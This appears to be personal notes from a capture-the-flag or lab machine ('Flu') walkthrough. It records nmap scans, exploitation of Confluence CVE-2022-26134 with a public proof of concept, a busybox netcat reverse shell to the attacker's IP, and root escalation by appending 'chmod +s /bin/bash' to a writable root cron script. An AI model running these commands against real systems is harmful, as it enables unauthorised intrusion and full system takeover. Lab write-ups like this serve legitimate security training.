Flu

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services

22 ssh
8090 confluence

Public exploit

GitHub GitHub - nxtexploit/CVE-2022-26134: Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)

💡

Try at least 4 exploit pocs before moving on.

➜  CVE-2022-26134 git:(main) python3 CVE-2022-26134.py http://192.168.245.41:8090 whoami
Confluence target version: 7.13.6
confluence 
➜  CVE-2022-26134 git:(main)

YOOO

💡

ALWAYS USE BUSYBOX NETCAT

python3 CVE-2022-26134.py http://192.168.245.41:8090 'busybox nc 192.168.45.171 22 -e sh'

Local

881eb6ca6cbaf31eb219c17c23d10ed2

Ran pspsy found backup

2024/08/11 16:41:01 CMD: UID=0     PID=3061   | /usr/sbin/CRON -f -P 
2024/08/11 16:41:01 CMD: UID=0     PID=3062   | /bin/bash /opt/log-backup.sh 
2024/08/11 16:41:01 CMD: UID=0     PID=3063   | /bin/bash /opt/log-backup.sh 
2024/08/11 16:41:01 CMD: UID=0     PID=3065   | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101 
2024/08/11 16:41:01 CMD: UID=0     PID=3066   | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101 
2024/08/11 16:41:01 CMD: UID=0     PID=3067   | 
2024/08/11 16:41:01 CMD: UID=0     PID=3068   | 
2024/08/11 16:41:01 CMD: UID=0     PID=3069   | 
2024/08/11 16:41:01 CMD: UID=0     PID=3070   | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/11 16:41:06 CMD: UID=0     PID=3071   |

We can echo into it

echo "chmod +s /bin/bash" >> log-backup.sh

we wait and can exec!

/bin/bash -p

proof:

4b230a2820e2be2549a9d3469cd70b11